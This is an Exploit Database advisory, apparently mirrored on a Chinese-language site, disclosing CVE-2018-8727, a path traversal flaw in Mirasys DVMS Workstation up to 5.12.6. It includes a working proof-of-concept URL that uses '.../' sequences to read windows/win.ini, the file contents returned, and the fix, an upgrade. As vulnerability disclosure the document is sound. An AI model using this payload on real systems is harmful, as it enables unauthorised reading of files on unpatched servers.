Mirasys DVMS Workstation 5.12.6 – Path Traversal

• Exploit Database
• 22 阅读

• 作者： Onvio
  日期： 2018-06-20
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44907/

• # Exploit Title: Path Traversal in Gateway in Mirasys DVMS Workstation <= 5.12.6
  # Date: 10-06-2018
  # Exploit Author: Onvio, Dick Snel, https://www.onvio.nl
  # Vendor Homepage: https://www.mirasys.com/
  # Software Link: https://www.onvio.nl/binaries/mirasys_5_12_6.zip
  # Version: <= 5.12.6
  # Tested on: Windows 10 Pro x64
  # CVE : CVE-2018-8727
  
  1. Description
  
  Path Traversal in Gateway in Mirasys DVMS Workstation <= 5.12.6 allows an attacker to traverse the file system to access files or directories via the Web Client webserver.
  
  More detail on the exploit: https://www.onvio.nl/nieuws/cve-mirasys-vulnerability
  
  2. Proof of Concept
  
  http://localhost:9999/.../.../.../.../.../.../.../.../.../windows/win.ini
  ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 
  
  3. Solution
  
  Upgrade to any version > 5.12.6